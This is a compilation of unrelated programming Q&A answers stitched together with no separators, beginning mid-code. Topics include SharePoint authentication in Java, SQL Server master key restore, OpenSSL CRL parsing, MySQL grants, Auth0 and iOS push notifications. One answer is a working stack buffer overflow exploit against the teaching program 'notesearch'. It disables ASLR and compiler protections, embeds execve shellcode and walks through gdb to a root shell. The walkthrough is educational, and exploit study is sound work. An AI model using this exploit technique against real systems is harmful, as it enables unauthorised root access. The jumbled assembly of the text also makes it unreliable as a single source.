RequestEntity<>(headers, HttpMethod.POST, new URI(sharePointProperties.getEndpoint() + "/_api/contextinfo")); ResponseEntity<String> responseEntity = restTemplate.exchange(requestEntity, String.class); JSONObject json = new JSONObject(responseEntity.getBody()); return json.getJSONObject("d") .getJSONObject("GetContextWebInformation") .getString("FormDigestValue"); } public Long parseExecutionDateTime(Date dateTime) { if (dateTime == null) return null; final Calendar cal = Calendar.getInstance(); cal.setTime(dateTime); cal.set(Calendar.HOUR_OF_DAY, 0); cal.set(Calendar.MINUTE, 0); cal.set(Calendar.SECOND, 0); cal.set(Calendar.MILLISECOND, 0); return cal.getTime().getTime(); } } Methods from this service should be called as follows: package com.waveaccess.someproject.commons.service; import com.google.common.base.Joiner; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.http.HttpMethod; import org.springframework.http.RequestEntity; import org.springframework.http.ResponseEntity; import org.springframework.stereotype.Service; import org.springframework.util.LinkedMultiValueMap; import org.springframework.util.MultiValueMap; import org.springframework.web.client.RestTemplate; import java.net.URI; import java.util.Date; import java.util.List; /** * @author Maksim Kanev */ @Service public class SharePointService { private static final Logger log = LoggerFactory.getLogger(SharePointService.class); @Autowired private SharePointServiceCached serviceCached; @Autowired private RestTemplate restTemplate; public String performHttpRequest(HttpMethod method, String path) throws Exception { Long executionDateTime = serviceCached.parseExecutionDateTime(new Date()); String securityToken = serviceCached.receiveSecurityToken(executionDateTime); List<String> cookies = serviceCached.getSignInCookies(securityToken); MultiValueMap<String, String> headers = new LinkedMultiValueMap<>(); headers.add("Cookie", Joiner.on(';').join(cookies)); RequestEntity<String> requestEntity = new RequestEntity<>(headers, method, new URI(path)); ResponseEntity<String> responseEntity = restTemplate.exchange(requestEntity, String.class); String responseBody = responseEntity.getBody(); log.debug(responseBody); return responseBody; } public String performHttpRequest(String path, String json, boolean isUpdate, boolean isWithDigest) throws Exception { Long executionDateTime = serviceCached.parseExecutionDateTime(new Date()); String securityToken = serviceCached.receiveSecurityToken(executionDateTime); List<String> cookies = serviceCached.getSignInCookies(securityToken); String formDigestValue = serviceCached.getFormDigestValue(cookies); MultiValueMap<String, String> headers = new LinkedMultiValueMap<>(); headers.add("Cookie", Joiner.on(';').join(cookies)); headers.add("Content-type", "application/json;odata=verbose"); if (isWithDigest) { headers.add("X-RequestDigest", formDigestValue); } if (isUpdate) { headers.add("X-HTTP-Method", "MERGE"); headers.add("IF-MATCH", "*"); } RequestEntity<String> requestEntity = new RequestEntity<>(json, headers, HttpMethod.POST, new URI(path)); ResponseEntity<String> responseEntity = restTemplate.exchange(requestEntity, String.class); String responseBody = responseEntity.getBody(); log.debug(responseBody); return responseBody; } public String attachFile(String path, byte[] file) throws Exception { Long executionDateTime = serviceCached.parseExecutionDateTime(new Date()); String securityToken = serviceCached.receiveSecurityToken(executionDateTime); List<String> cookies = serviceCached.getSignInCookies(securityToken); String formDigestValue = serviceCached.getFormDigestValue(cookies); MultiValueMap<String, String> headers = new LinkedMultiValueMap<>(); headers.add("Cookie", Joiner.on(';').join(cookies)); headers.add("X-RequestDigest", formDigestValue); headers.add("content-length", String.valueOf(file.length)); RequestEntity<byte[]> requestEntity = new RequestEntity<>(file, headers, HttpMethod.POST, new URI(path)); ResponseEntity<String> responseEntity = restTemplate.exchange(requestEntity, String.class); String responseBody = responseEntity.getBody(); log.debug(responseBody); return responseBody; } } Configuration of XPathExpressionFactoryBean: package com.waveaccess.someproject.commons.config; import com.waveaccess.someproject.commons.config.properties.SharePointProperties; import org.springframework.boot.context.properties.EnableConfigurationProperties; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import org.springframework.xml.xpath.XPathExpressionFactoryBean; import java.util.HashMap; import java.util.Map; /** * @author Maksim Kanev */ @Configuration @EnableConfigurationProperties({SharePointProperties.class}) public class SharePointConfiguration { @Bean public XPathExpressionFactoryBean securityTokenExpressionFactoryBean() { XPathExpressionFactoryBean xPathExpressionFactoryBean = new XPathExpressionFactoryBean(); xPathExpressionFactoryBean.setExpression("/S:Envelope/S:Body/wst:RequestSecurityTokenResponse/wst:RequestedSecurityToken/wsse:BinarySecurityToken"); Map<String, String> namespaces = new HashMap<>(); namespaces.put("S", "http://www.w3.org/2003/05/soap-envelope"); namespaces.put("wsse", "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"); namespaces.put("wsu", "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"); namespaces.put("wsa", "http://www.w3.org/2005/08/addressing"); namespaces.put("wst", "http://schemas.xmlsoap.org/ws/2005/02/trust"); xPathExpressionFactoryBean.setNamespaces(namespaces); return xPathExpressionFactoryBean; } } And finally SharePointProperties: package com.waveaccess.someproject.commons.config.properties; import org.springframework.boot.context.properties.ConfigurationProperties; /** * @author Maksim Kanev */ @ConfigurationProperties("sharepoint") public class SharePointProperties { private String username; private String password; public String getUsername() { return username; } public void setUsername(String username) { this.username = username; } public String getPassword() { return password; } public void setPassword(String password) { this.password = password; } }
TL;DR: It is normal for cipher text to be different on each encryption, all other things being equal. I believe this is intentional "randomisation" of the output in order not to make password guessing easier. (The signature, however, will always be the same.) If you will look at your DMK backup files' contents side by side, you will see that the first 40-60 bytes have almost identical structure (same amounts of spaces in the same places, for instance); only some data differ. This is a header where the salt, among other things, is located. Salt doesn't need to be hidden; it only needs to be random. Now about the errors you receive during the restore which, for some reason, cannot be made known. I have created the test environment and two DMK backups just as you did. In addition, in order to make things a bit more realistic, I created a certificate without specifying the encryption password: create certificate [TestCert] authorization [dbo] with subject = 'DMK Restore Test certificate'; This means that the certificate private key will be encrypted using the DMK, so now we have some encrypted data. If I try to restore the DMK from its first backup: restore master key from file = 'D:\Tests\Key1.dmk' decryption by password = 'asdfdgkjh98hvio' encryption by password = 'nmbneknfownoih'; SSMS outputs the following message (not an error, mind you): The old and new master keys are identical. No data re-encryption is required. The key is currently open, because it's a default behaviour, and no differences are detected. Trying to create a signature using our cert proves that data encrypted by DMK (cert's private key) is accessible: select signbycert(cert_id('TestCert'), 'ASDfgh'); (You will see some varbinary(128) output for the above). However, if I turn off the key auto-opening by removing its copy from the master, which is a common scenario when you restore the database backup: alter master key drop encryption by service master key; and then try to restore using the same restore master key statement as above, there will be an error, indeed: Msg 15329, Level 16, State 30, Line 1 The current master key cannot be decrypted. If this is a database master key, you should attempt to open it in the session before performing this operation. The FORCE option can be used to ignore this error and continue the operation but the data encrypted by the old master key will be lost. The keys (existing and the one being restored) are still the same, but this time SQL Server can't see it - the DMK is closed. Trying to sign using the cert returns NULL for the same reason. Note the mentioning of the FORCE option. If I add it: restore master key from file = 'D:\Tests\Key1.dmk' decryption by password = 'asdfdgkjh98hvio' encryption by password = 'nmbneknfownoih' force; the result is, again, just an informational message: The current master key cannot be decrypted. The error was ignored because the FORCE option was specified. The only thing left to get your data back is to either explicitly open the DMK, or turn its auto-opening back on: open master key decryption by password = 'nmbneknfownoih'; go -- And if you need it to be always available in the future alter master key add encryption by service master key; go After that, certificate signing starts to work again (and will return exactly the same binary data as it did the first time).
Error i am getting is: CRL Error d06b08e : error:0D06B08E:lib(13):func(107):reason(142) : a_d2i_fp.c : 246 Why is d2i_X509_CRL_bio returning NULL, and how do I fix it? The problem is below. http_reply->payload is binary data with embedded NULLs, so you need to provide an explicit length, and not use -1. bp_bio = BIO_new_mem_buf(http_reply->payload, -1); I'm guessing if you change -1 to 1163154, then it will work as expected: $ ls -al ss.crl -rw-r--r-- ... 1163154 Nov 17 04:06 ss.crl Also see the bio_new_mem_buf man page: BIO_new_mem_buf() creates a memory BIO using len bytes of data at buf, if len is -1 then the buf is assumed to be nul terminated and its length is determined by strlen. The BIO is set to a read only state and as a result cannot be written to... Here's how you can verify OpenSSL's side of things. Fetch CRL $ wget -O ss.crl 'http://ss.symcb.com/ss.crl' --2016-11-17 07:15:49-- http://ss.symcb.com/ss.crl Resolving ss.symcb.com (ss.symcb.com)... 23.4.181.163 ... Connecting to ss.symcb.com (ss.symcb.com)|23.4.181.163|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [application/pkix-crl] Saving to: ‘ss.crl’ ss.crl [ <=> ] 1.11M 3.75MB/s in 0.3s Verify CRL Use Peter Gutmann's dumpasn1 to see if its well formed: $ dumpasn1 ss.crl 0 1163149: SEQUENCE { 5 1162868: SEQUENCE { 10 1: INTEGER 1 13 13: SEQUENCE { 15 9: OBJECT IDENTIFIER : sha256WithRSAEncryption (1 2 840 113549 1 1 11) 26 0: NULL : } 28 126: SEQUENCE { 30 11: SET { 32 9: SEQUENCE { 34 3: OBJECT IDENTIFIER countryName (2 5 4 6) 39 2: PrintableString 'US' : } : } 43 29: SET { 45 27: SEQUENCE { 47 3: OBJECT IDENTIFIER organizationName (2 5 4 10) 52 20: PrintableString 'Symantec Corporation' : } : } 74 31: SET { 76 29: SEQUENCE { 78 3: OBJECT IDENTIFIER organizationalUnitName (2 5 4 11) 83 22: PrintableString 'Symantec Trust Network' : } : } ... 1162878 13: SEQUENCE { 1162880 9: OBJECT IDENTIFIER : sha256WithRSAEncryption (1 2 840 113549 1 1 11) 1162891 0: NULL : } 1162893 257: BIT STRING : A6 4F 77 4E 4C EB E2 6A 13 28 02 25 6C D8 41 56 : 71 35 19 02 47 53 44 B0 F1 6A CB 37 61 EC 1F 20 : 56 08 97 0C 58 33 7F 40 7E 87 29 0B 47 35 28 8B : 1B 2A 0D 1F C5 1F F8 03 E8 6A FF E7 D3 BF C3 69 : 8D 3D BF 8D 1A 44 4A A2 2A 5A C3 1C 8E 5F 0C 1F : 24 3E 49 99 8E F3 98 CB BD 3C EA D4 A0 A2 3C E6 : D9 10 FE F2 C0 27 97 75 25 58 27 84 F0 1B 90 A3 : 0D 55 D7 EA D3 AE 0C BC BB F3 D7 77 CD 3A 0D 19 : [ Another 128 bytes skipped ] : } 0 warnings, 0 errors. Load CRL $ cat test-crl.c #include <stdio.h> #include <openssl/x509.h> #include <openssl/bio.h> int main(int argc, char* argv[]) { BIO* bio = BIO_new_file("ss.crl", "r"); if(bio == NULL) { fprintf(stderr, "Failed to create BIO\n"); exit(1); } X509_CRL* crl = d2i_X509_CRL_bio(bio, NULL); if(crl == NULL) { fprintf(stderr, "Failed to create CRL\n"); exit(1); } fprintf(stdout, "Loaded CRL\n"); X509_CRL_free(crl); BIO_free(bio); return 0; } $ gcc -I /usr/local/include test-crl.c /usr/local/lib/libcrypto.a -o test-crl.exe $ ./test-crl.exe Loaded CRL You can usually make sense of the error codes with the openssl errstr utility: $ openssl errstr 0xd06b08e error:0D06B08E:asn1 encoding routines:asn1_d2i_read_bio:not enough data The only time I have seen it fail is when decoding FIPS error codes if the openssl utility is not configured for FIPS. http_reply->payload You should verify your http_reply->payload is the same data provided by other tools, like wget. Below shows the first and last 64 bytes when fetching with wget. $ wget -O ss.crl 'http://ss.symcb.com/ss.crl' --2016-11-17 14:12:20-- http://ss.symcb.com/ss.crl Resolving ss.symcb.com (ss.symcb.com)... 23.4.181.163 ... Connecting to ss.symcb.com (ss.symcb.com)|23.4.181.163|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [application/pkix-crl] Saving to: ‘ss.crl’ ... $ head -c 64 ss.crl | xxd -g 1 0000000: 30 83 11 bf 8d 30 83 11 be 74 02 01 01 30 0d 06 0....0...t...0.. 0000010: 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b .*.H........0~1. 0000020: 30 09 06 03 55 04 06 13 02 55 53 31 1d 30 1b 06 0...U....US1.0.. 0000030: 03 55 04 0a 13 14 53 79 6d 61 6e 74 65 63 20 43 .U....Symantec C $ tail -c 64 ss.crl | xxd -g 1 0000000: 16 2a d7 ab 7c e2 42 0e 95 32 14 fe f1 0d b8 6d .*..|.B..2.....m 0000010: a4 9b ec 17 fb b3 db d2 0b 9d 83 a8 a7 79 5b d5 .............y[. 0000020: e9 56 4d aa 65 e3 3b f5 ad 79 58 c7 0a d4 00 3b .VM.e.;..yX....; 0000030: f8 c6 73 df 9e c0 54 7d 57 05 2d 7f cb 5c bc 74 ..s...T}W.-..\.t
I was able to modify your sample code to get it to work in 64-bit with the notesearch program from the book. Many of the protections in modern OSes and build tools must be turned off for this to work, but it is obviously for educational purposes, so that's reasonable for now. First, turn off ASLR on your system with: echo 0 > /proc/sys/kernel/randomize_va_space This must be done as root, and it won't work with sudo, since the sudo will only apply to the echo command, not the redirection. Just sudo -i first, then run it. Next, the notesearch program must be compiled with two important safety protections disabled. By default, your program would be built with stack canaries for the detection of buffer overflows and also a non-executable stack, since there's usually no legitimate reason to run code from the stack. gcc -g -z execstack -fno-stack-protector -o notesearch notesearch.c Now, the exploit code: #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <unistd.h> char shellcode[]= "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53" "\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"; int main(int argc, char *argv[]) { char *command, *buffer; command = (char *) malloc(200); bzero(command, 200); // zero out the new memory strcpy(command, "./notesearch \'"); // start command buffer buffer = command + strlen(command); // set buffer at the end memset(buffer, 'A', 0x78); // Fill buffer up to return address *(unsigned long long*)(buffer+0x78) = 0x7fffffffe1c0; memcpy(buffer, shellcode, sizeof(shellcode)-1); strcat(command, "\'"); system(command); // run exploit } This problem can be narrowed down to a simple return address overwrite, so no NOP sled is required. Additionally, the shellcode from your original post was for 32-bit only. The 64-bit shellcode I used is from http://shell-storm.org/shellcode/files/shellcode-806.php. The big question: Where did 0x78 and 0x7fffffffe1c0 come from? I started out with a number larger than 0x78 since I didn't know what to use. I just guessed 175 since it's bigger than the target buffer. So the first iteration had these lines: memset(buffer, 'A', 175); // Overflow buffer //*(unsigned long long*)(buffer+???) = ???; Now to try that out. Note that, while testing, I used a non-setuid version of notesearch to facilitate successful core dumps. ulimit -c unlimited gcc myexp.c ./a.out The notesearch program crashed and created a core file: deb82:~/notesearch$ ./a.out [DEBUG] found a 15 byte note for user id 1000 -------[ end of note data ]------- Segmentation fault (core dumped) deb82:~/notesearch$ Running gdb ./notesearch core shows: Program terminated with signal SIGSEGV, Segmentation fault. #0 0x00000000004008e7 in main (argc=2, argv=0x7fffffffe2c8) at notesearch.c:35 35 } (gdb) Good. It crashed. Why? (gdb) x/1i $rip => 0x4008e7 <main+158>: retq (gdb) x/1gx $rsp 0x7fffffffe1e8: 0x4141414141414141 (gdb) It's trying to return to our controlled address (all A's). Good. What offset from our controlled string (searchstring) points to the return address? (gdb) p/x (unsigned long long)$rsp - (unsigned long long)searchstring $1 = 0x78 (gdb) So now we try again, with these changes: memset(buffer, 'A', 0x78); // Fill buffer up to return address *(unsigned long long*)(buffer+0x78) = 0x4242424242424242; Again, we get a core dump. Analyzing it shows: Program terminated with signal SIGSEGV, Segmentation fault. #0 0x00000000004008e7 in main (argc=2, argv=0x7fffffffe318) at notesearch.c:35 35 } (gdb) x/1i $rip => 0x4008e7 <main+158>: retq (gdb) x/1gx $rsp 0x7fffffffe238: 0x4242424242424242 (gdb) Good, we controlled the return address more surgically. Now, what do we want to put there instead of a bunch of B's? Search a reasonable range of stack for our shellcode (0xbb48c031 is a DWORD corresponding to the first 4 bytes in the shellcode buffer). Just mask off the lower 3 digits and start at the beginning of the page. (gdb) find /w 0x7fffffffe000,$rsp,0xbb48c031 0x7fffffffe1c0 1 pattern found. (gdb) So our shellcode exists on the stack at 0x7fffffffe1c0. This is our desired return address. Updating the code with this information, and making notesearch setuid root again, we get: deb82:~/notesearch$ whoami user deb82:~/notesearch$ ./a.out [DEBUG] found a 15 byte note for user id 1000 -------[ end of note data ]------- # whoami root # The code I provided may work as is on your setup, but most likely, you'll probably need to follow a similar path to get the correct offsets to use.
From AWS documentation: Two common causes of connection failures to a new DB instance are: The DB instance was created using a security group that does not authorize connections from the device or Amazon EC2 instance where the MySQL application or utility is running. If the DB instance was created in a VPC, it must have a VPC security group that authorizes the connections. If the DB instance was created outside of a VPC, it must have a DB security group that authorizes the connections. The DB instance was created using the default port of 3306, and your company has firewall rules blocking connections to that port from devices in your company network. To fix this failure, recreate the instance with a different port. You can use SSL encryption on connections to an Amazon RDS MySQL DB instance. For information, see Using SSL with a MySQL DB Instance. While I would confirm that option 1 and 2 are not the case before proceeding, once you've discounted the obvious, check you permissions by accessing the MySQL server directly, and typing: SHOW GRANTS FOR 'myuser'@'localhost' If something relating to SSL shows up, then one of two things are happening: You are not properly including an SSL certificate in your code You are not including the correct part of the SSL certificate in your code. Follow this tutorial and ensure you are running the right SSL certificate. You should be able to rebuild your certificate and run successfully. From the link above, if you have SSL encryption, your end code should look something like this: using (MySqlConnection connection = new MySqlConnection( "database=test;user=sslclient;" + "CertificateFile=H:\\bzr\\mysql-trunk\\mysql-test\\std_data\\client.pfx" + "CertificatePassword=pass;" + "SSL Mode=Required ")) { connection.Open(); } Where the \path\to\client.pfx is the path to your .pfx file. If nothing shows up or you receive the error explained in the comments Error Code: 1141 There is no such grant defined for user '***' on host '***.***.***', you can check your user permissions another way. On the MySQL shell: select * from mysql.user where User='<myuser>'; If you see a wildcard in the host, it means that a user can log in from anywhere. While horribly insecure, this may be what you're looking for. You can then go back and use SHOW GRANTS mirroring the host name exactly as it shows up in your return query. Please note that you may see something like this: Host ----- %.myhostname.tld If your domain is subdomain.myhostname.tld then this wildcard matches, and you would use: SHOW GRANTS FOR 'myuser'@'%.myhostname.tld'; If you don't have a user with any matching permissions You will be unable to connect to your MySQL instance at all. You will need to create a user that matches your host. CREATE USER 'myuser'@'myhost' IDENTIFIED BY '<password>'; GRANT ALL ON <database>.* TO 'myuser'@'myhost'; If you want SSL: GRANT ALL ON <database>.* TO 'myuser'@'myhost' REQUIRE SSL;
If you haven't done so, you should follow this article (React Login with Auth0) to implement the authentication on your React application. If you already tried to follow it, update your question with specific issues you faced. Even though you currently not need SSO, the actual implementation of the authentication in your application will not vary much. By using Auth0 enabling SSO across your apps is mostly enabling configuration switches. Finally for a full reference with all the theory behind the security related aspects of your exact scenario check: Auth0 Architecture Scenarios: SPA + API Update: The full scenario I linked too covers the most comprehensive scenarios where an API is accessed by a multitude of client applications that may even be developed by third-parties that do not own the protected API, but want to access the data behind it. It does this by leveraging recent features that are currently only available in the US region and that at a very high level can be described as an OAuth 2.0 authorization server delivered as a service. Your particular scenario is simpler, both the API and client application are under control of the same entity, so you have another option. Option 1 - Leverage the API authorization through Auth0 US region only (for now) In this situation your client application, at authentication time, would receive an id_token that would be used to know the currently authenticated user and would also receive an access_token that could be used to call the API on behalf of the authenticated user. This makes a clear separation between the client application and the API; the id_token is for client application usage and the access_token for API usage. It has the benefit that authorization is clearly separated from authentication and you can have a very fine-grained control over authorization decisions by controlling the scopes included in the access token. Option 2 - Authenticate in client application and API in the same way You can deploy your client application and API separately, but still treat them from a conceptual perspective as the same application (you would have one client configured in Auth0 representing both client-side and API). This has the benefit that you could use the id_token that is obtained after authentication completes to know who the user was on the client-side and also as the mechanism to authenticate each API request. You would have to configure feathers API to validate the Auth0 id_token as an accepted token for accessing the API. This means that you don't use any feathers based on authentication on the API, that is, you just accept tokens issued by Auth0 to your application as the way to validate the access.
You need to ensure your XML nodes are in alphabetical order: <?xml version="1.0" encoding="utf-8" ?> <KioskSettings xmlns="http://schemas.datacontract.org/2004/07/Proxies" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"> <EncryptionKey>abcd</EncryptionKey> <HeartBeatInterval>1</HeartBeatInterval> <ID>20198</ID> <ServerURL></ServerURL> </KioskSettings> Serialize a KioskSettings object with the following code, and ensure your XML takes the same form: public static string DataContractSerializeObject<T>(T objectToSerialize) { using (MemoryStream memStm = new MemoryStream()) { var serializer = new DataContractSerializer(typeof(T)); serializer.WriteObject(memStm, objectToSerialize); memStm.Seek(0, SeekOrigin.Begin); using (var streamReader = new StreamReader(memStm)) { string result = streamReader.ReadToEnd(); return result; } } } If you need to preserve a specific order then specify the DataMember attribute on your class properties - Data Member Order e.g. [DataContract] public class KioskSettings { [DataMember(Order = 1)] public string ID { get; set; } [DataMember(Order = 2)] public int HeartBeatInterval { get; set; } [DataMember(Order = 3)] public string ServerURL { get; set; } [DataMember(Order = 4)] public string EncryptionKey { get; set; } }
If I understand your question correctly, what you're asking is impossible. I'm no cryptography expert, but I'll try to explain the best I can: Let e(x) be a function that encrypts a given x Let d(x) be a function that decrypts a given x Let x be some string. Just think about this for a second. If e(x) takes x and encrypts it, then there must exist a d(x) that will decrypt our ciphertext and give us our original text back. Otherwise, our encryption algorithm is useless! If the size of the result of e(x) could not change, then it would be impossible for d(x) to exist. This is because there is only so much data that can be encoded in text (127 possible values per byte in ascii). So naturally, as the size of the input message to e(x) grows, the size of some cipher text (the result of e(x)) will also grow at similar rate. If you want to reduce the size of the output text, you can look into using compression. I don't have much experience in this personally, but you may want to look into something like GZipStream. Also, as Luke suggested, you may be looking for a hashing algorithm, which will make your text a fixed size. For c#, maybe look into HashAlgorithm
I believe the below code will give you the feasible solution for your problem, Paste the below code in your Java file private static JSONObject get(Context ctx, String sUrl) { HttpURLConnection connection = null; try { URL url = new URL(sUrl); connection = (HttpURLConnection) url.openConnection(); connection.setRequestProperty("Content-Type", "application/json"); connection.setRequestProperty("Accept", "application/json"); connection.setRequestProperty("Authorization", "Basic " + encodedAuthentication); connection.setRequestProperty("Accept-Charset", "utf-8,*"); Log.d("Get-Request", url.toString()); try { BufferedReader bufferedReader = new BufferedReader( new InputStreamReader(connection.getInputStream())); StringBuilder stringBuilder = new StringBuilder(); String line; while ((line = bufferedReader.readLine()) != null) { stringBuilder.append(line).append("\n"); } bufferedReader.close(); Log.d("Get-Response", stringBuilder.toString()); return new JSONObject(stringBuilder.toString()); } finally { connection.disconnect(); } } catch (Exception e) { Log.e("ERROR", e.getMessage(), e); return null; } } private static String buildSanitizedRequest(String url, Map<String, String> mapOfStrings) { Uri.Builder uriBuilder = new Uri.Builder(); uriBuilder.encodedPath(url); if (mapOfStrings != null) { for (Map.Entry<String, String> entry : mapOfStrings.entrySet()) { Log.d("buildSanitizedRequest", "key: " + entry.getKey() + " value: " + entry.getValue()); uriBuilder.appendQueryParameter(entry.getKey(), entry.getValue()); } } String uriString; try { uriString = uriBuilder.build().toString(); // May throw an // UnsupportedOperationException } catch (Exception e) { Log.e("Exception", "Exception" + e); } return uriBuilder.build().toString(); } And your Json calling part should look like this public static JSONObject exampleGetMethod(Context ctx, String sUrl,String yourName) throws JSONException, IOException { Map<String, String> request = new HashMap<String, String>(); request.put("yourName", yourName); sUrl = sUrl + "yourApiName"; return get(ctx, buildSanitizedRequest(sUrl, request)); } In the above code - startDate, endDate,yourName and username are the input parameters. sUrl is the API url + API name Finally when you call exampleGetMethod(Context,String,String,String,String,String); you will get the JSON response of requested URL. If you want to get the specific array value from the response you need to think of below logic JSONArray a = response.getJSONArray("contacts"); JSONObject needyArray; for (int i = 0; i < a.length(); i++) { if(a.getJSONObject(i).optString("name").equals("kumar")){ needyArray = a.getJSONObject(i); break; } } Now the needyArray JSONObject variable have the data of particular person(kumar as the example)
If you were developing with client app, you can refer the code below to acquire the token: string authority = "https://login.microsoftonline.com/xxxx.onmicrosoft.com"; string resrouce = "https://graph.windows.net"; string clientId = ""; string userName = ""; string password = ""; UserPasswordCredential userPasswordCredential = new UserPasswordCredential(userName,password); AuthenticationContext authContext = new AuthenticationContext(authority); var token= authContext.AcquireTokenAsync(resrouce,clientId, userPasswordCredential).Result.AccessToken; And if you were developing with web app( this is not common scenario), there is no such method in ADAL V3 to support this scenario. As a workaround, you may construct the request yourself. Here is an example for your reference: POST: https://login.microsoftonline.com/xxxxx.onmicrosoft.com/oauth2/token Content-Type: application/x-www-form-urlencoded resource={resource}&client_id={clientId}&grant_type=password&username={userName}&password={password}&scope=openid&client_secret={clientSecret}
User credentials (≈passwords) are among the most valuable assets stored in an application. They are a prime target for attackers, and as a developer, you want to protect them the best you can. The principle of defense in depth (and common sense) indicates that the more layers of protection you can put around something, the more secure it will be. So as you also mentioned, the purpose of hashing passwords is that even if there is a breach, an attacker still can't get hold of actual user credentials. The problem with encryption is always key management. If passwords were stored encrypted, they would need to be decrypted (or the received password encrypted with the same key) to be able to verify a password. For this, the application would need to have access to the key. But that negates the purpose of encryption, an attacker would also have access to the key in case of a breach. (Public key cryptography could make it somewhat more difficult, but essentially the same problem of key management would still persist.) So in short, only storing salted hashes with an algorithm that is slow enough to prevent brute-force attacks (like PBKDF2 or Bcrypt) is both the simplest and the most secure. (Also note that plain salted hashes are not good enough anymore.)
You can create your own php file. Source https://github.com/hasyapanchasara/PushKit_SilentPushNotification Use below structure to achieve your task. Use this simplepush.php file <?php // Put your device token here (without spaces): $deviceToken = '1234567890123456789'; // // Put your private key's passphrase here: $passphrase = 'ProjectName'; // Put your alert message here: $message = 'My first push notification!'; $ctx = stream_context_create(); stream_context_set_option($ctx, 'ssl', 'local_cert', 'PemFileName.pem'); stream_context_set_option($ctx, 'ssl', 'passphrase', $passphrase); // Open a connection to the APNS server $fp = stream_socket_client( // 'ssl://gateway.push.apple.com:2195', $err, 'ssl://gateway.sandbox.push.apple.com:2195', $err, $errstr, 60, STREAM_CLIENT_CONNECT|STREAM_CLIENT_PERSISTENT, $ctx); if (!$fp) exit("Failed to connect: $err $errstr" . PHP_EOL); echo 'Connected to APNS' . PHP_EOL; // Create the payload body $body['aps'] = array( 'content-available'=> 1, 'alert' => $message, 'sound' => 'default', 'badge' => 0, ); // Encode the payload as JSON $payload = json_encode($body); // Build the binary notification $msg = chr(0) . pack('n', 32) . pack('H*', $deviceToken) . pack('n', strlen($payload)) . $payload; // Send it to the server $result = fwrite($fp, $msg, strlen($msg)); if (!$result) echo 'Message not delivered' . PHP_EOL; else echo 'Message successfully delivered' . PHP_EOL; // Close the connection to the server fclose($fp); Use below commands to create pem file and use it in above code $ openssl x509 -in aps_development.cer -inform der -out PushCert.pem # Convert .p12 to .pem. Enter your pass pharse which is the same pwd that you have given while creating the .p12 certificate. PEM pass phrase also same as .p12 cert. $ openssl pkcs12 -nocerts -out PushKey1.pem -in pushkey.p12 Enter Import Password: MAC verified OK Enter PEM pass phrase: Verifying - Enter PEM pass phrase: # To remove passpharse for the key to access globally. This only solved my stream_socket_client() & certificate capath warnings. $ openssl rsa -in PushKey1.pem -out PushKey1_Rmv.pem Enter pass phrase for PushChatKey1.pem: writing RSA key # To join the two .pem file into one file: $ cat PushCert.pem PushKey1_Rmv.pem > ApnsDev.pem After that go to simplepush.php location and fire command -> php simplepush.php This way you can test your push kit notification setup architecture. https://zeropush.com/guide/guide-to-pushkit-and-voip https://www.raywenderlich.com/123862/push-notifications-tutorial Download Updated with Swift 4 code import UIKit import PushKit @UIApplicationMain class AppDelegate: UIResponder, UIApplicationDelegate,PKPushRegistryDelegate { var window: UIWindow? var isUserHasLoggedInWithApp: Bool = true var checkForIncomingCall: Bool = true var userIsHolding: Bool = true func application(application: UIApplication, didFinishLaunchingWithOptions launchOptions: [NSObject: AnyObject]?) -> Bool { if #available(iOS 8.0, *){ let viewAccept = UIMutableUserNotificationAction() viewAccept.identifier = "VIEW_ACCEPT" viewAccept.title = "Accept" viewAccept.activationMode = .Foreground viewAccept.destructive = false viewAccept.authenticationRequired = false let viewDecline = UIMutableUserNotificationAction() viewDecline.identifier = "VIEW_DECLINE" viewDecline.title = "Decline" viewDecline.activationMode = .Background viewDecline.destructive = true viewDecline.authenticationRequired = false let INCOMINGCALL_CATEGORY = UIMutableUserNotificationCategory() INCOMINGCALL_CATEGORY.identifier = "INCOMINGCALL_CATEGORY" INCOMINGCALL_CATEGORY.setActions([viewAccept,viewDecline], forContext: .Default) if application.respondsToSelector("isRegisteredForRemoteNotifications") { let categories = NSSet(array: [INCOMINGCALL_CATEGORY]) let types:UIUserNotificationType = ([.Alert, .Sound, .Badge]) let settings:UIUserNotificationSettings = UIUserNotificationSettings(forTypes: types, categories: categories as? Set<UIUserNotificationCategory>) application.registerUserNotificationSettings(settings) application.registerForRemoteNotifications() } } else{ let types: UIRemoteNotificationType = [.Alert, .Badge, .Sound] application.registerForRemoteNotificationTypes(types) } self.PushKitRegistration() return true } //MARK: - PushKitRegistration func PushKitRegistration() { let mainQueue = dispatch_get_main_queue() // Create a push registry object if #available(iOS 8.0, *) { let voipRegistry: PKPushRegistry = PKPushRegistry(queue: mainQueue) // Set the registry's delegate to self voipRegistry.delegate = self // Set the push type to VoIP voipRegistry.desiredPushTypes = [PKPushTypeVoIP] } else { // Fallback on earlier versions } } @available(iOS 8.0, *) func pushRegistry(registry: PKPushRegistry!, didUpdatePushCredentials credentials: PKPushCredentials!, forType type: String!) { // Register VoIP push token (a property of PKPushCredentials) with server let hexString : String = UnsafeBufferPointer<UInt8>(start: UnsafePointer(credentials.token.bytes), count: credentials.token.length).map { String(format: "%02x", $0) }.joinWithSeparator("") print(hexString) } @available(iOS 8.0, *) func pushRegistry(registry: PKPushRegistry!, didReceiveIncomingPushWithPayload payload: PKPushPayload!, forType type: String!) { // Process the received push // Below process is specific to schedule local notification once pushkit payload received var arrTemp = [NSObject : AnyObject]() arrTemp = payload.dictionaryPayload let dict : Dictionary <String, AnyObject> = arrTemp["aps"] as! Dictionary<String, AnyObject> if isUserHasLoggedInWithApp // Check this flag then only proceed { if UIApplication.sharedApplication().applicationState == UIApplicationState.Background || UIApplication.sharedApplication().applicationState == UIApplicationState.Inactive { if checkForIncomingCall // Check this flag to know incoming call or something else { var strTitle : String = dict["alertTitle"] as? String ?? "" let strBody : String = dict["alertBody"] as? String ?? "" strTitle = strTitle + "\n" + strBody let notificationIncomingCall = UILocalNotification() 